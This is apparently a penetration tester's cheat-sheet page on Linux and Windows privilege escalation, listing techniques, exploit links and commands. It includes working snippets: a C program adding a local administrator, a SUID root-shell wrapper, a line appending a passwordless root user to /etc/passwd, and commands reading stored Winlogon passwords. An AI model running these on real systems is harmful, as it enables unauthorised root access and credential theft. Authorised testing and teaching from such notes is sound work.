Priv Escalation

Search…
Priv Escalation
Privilege Escalation
GTFOBins
https://guif.re/linuxeop
guif.re
https://guif.re/windowseop
guif.re
FuzzySecurity | Windows Privilege Escalation Fundamentals
​https://payatu.com/guide-linux-privilege-escalation​
Linux Privilege Escalation
sudo -l
Kernel Exploits
OS Exploits
Password reuse (mysql, .bash_history, 000-default.conf...)
Known binaries with suid flag and interactive (nmap)
Custom binaries with suid flag either using other binaries or with command execution
Writable files owned by root that get executed (cronjobs)
MySQL as root
Vulnerable services (chkrootkit, logrotate)
Writable /etc/passwd
Readable .bash_history
SSH private key
Listening ports on localhost
/etc/fstab
/etc/exports
/var/mail
Process as other user (root) executing something you have permissions to modify
SSH public key + Predictable PRNG
apt update hooking (Pre-Invoke)
Capabilities
Windows Privilege Escalation
Kernel Exploits
OS Exploits
Pass The Hash
Password reuse
DLL hijacking (Path)
Vulnerable services
Writable services binaries path
Unquoted services
Listening ports on localhost
Registry keys
Kernel Exploits
Linux: https://github.com/lucyoa/kernel-exploits​
Windows: https://github.com/abatchy17/WindowsExploits​
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
http://www.fuzzysecurity.com/tutorials/16.html
​
Windows Add User
#include <stdlib.h> /* system, NULL, EXIT_FAILURE */
​
int main ()
{
  int i;
  i=system ("net user <username> <password> /add && net localgroup administrators <username> /add");
  return 0;
}
​
SUID Change
SUID
​
Set owner user ID.
​
int main(void){
  setresuid(0, 0, 0);
  system("/bin/bash");
}
​
Privilege Escalation:
#Find Binaries that will execute as the owner
find / -perm -u=s -type f 2>/dev/null
​
#Find binaries that will execute as the group
find / -perm -g=s -type f 2>/dev/null
​
#Find sticky-bit binaries
find / -perm -1000 -type d 2>/dev/null
​
find / -perm -4000 2>/dev/null
​
writable by everyone
find / -writable -type f 2>/dev/null
​
World writeable directories
find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep -v root
​
World writeable files
find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/null
​
Writeable config files
find /etc/ -writable -type f 2>/dev/null
​
find / -user root -perm -4000 -exec ls -ld {} \; 2> /dev/null
​
Window Exploit Suggester
python2 windows-exploit-suggester.py --database 2017-10-10-mssb.xls --systeminfo ../systeminfo.txt --quiet
python windows-exploit-suggester.py –systeminfo systeminfo.txt –database 2018-11-25-mssb.xls
Windows Priv Escalation
AlwaysInstallElevated
Check if the following registry settings are set to "1"
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
​
​
Basic Linux Enumeration
Distribution type & kernel version
cat /etc/*release*
uname -a
rpm -q kernel
dmesg | grep -i linux
​
Default writeable directory / folder
/tmp
/dev/shm
​
Search for passwords
Search for password within config.php
grep -R 'password' config.php
​
Find possible other writeable directory / folder
find / -type d \( -perm -g+w -or -perm -o+w \) -exec ls -adl {} \;
​
Service(s) running as root user
ps aux | grep root
ps -ef | grep root
​
Installed applications
ls -lah /usr/bin/
ls -lah /sbin/
dpkg -l
rpm -qa
ls -lah /var/cache/apt/archivesO
ls -lah /var/cache/yum/
​
Scheduled jobs
crontab -l
ls -la /etc/cron*
ls -lah /var/spool/cron
ls -la /etc/ | grep cron
cat /etc/crontab
cat /etc/anacrontab
​
Find pattern in file:
grep -rnw '/etc/passwd' -e 'root'
​
Sticky bit, SGID, SUID, GUID
Sticky bit
find / -perm -1000 -type d 2>/dev/null
​
SGID (chmod 2000)
find / -perm -g=s -type f 2>/dev/null
​
SUID (chmod 4000)
find / -perm -u=s -type f 2>/dev/null
find /* -user root -perm -4000 -print 2>/dev/null
​
SUID or GUID
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null
​
Add user to /etc/passwd and root group
echo hodor::0:0:root:/root:/bin/bash >> /etc/passwd
​
​
Transfer files on linux
Linux Priv Escalation
Last modified 2yr ago
Copy link
Outline
Privilege Escalation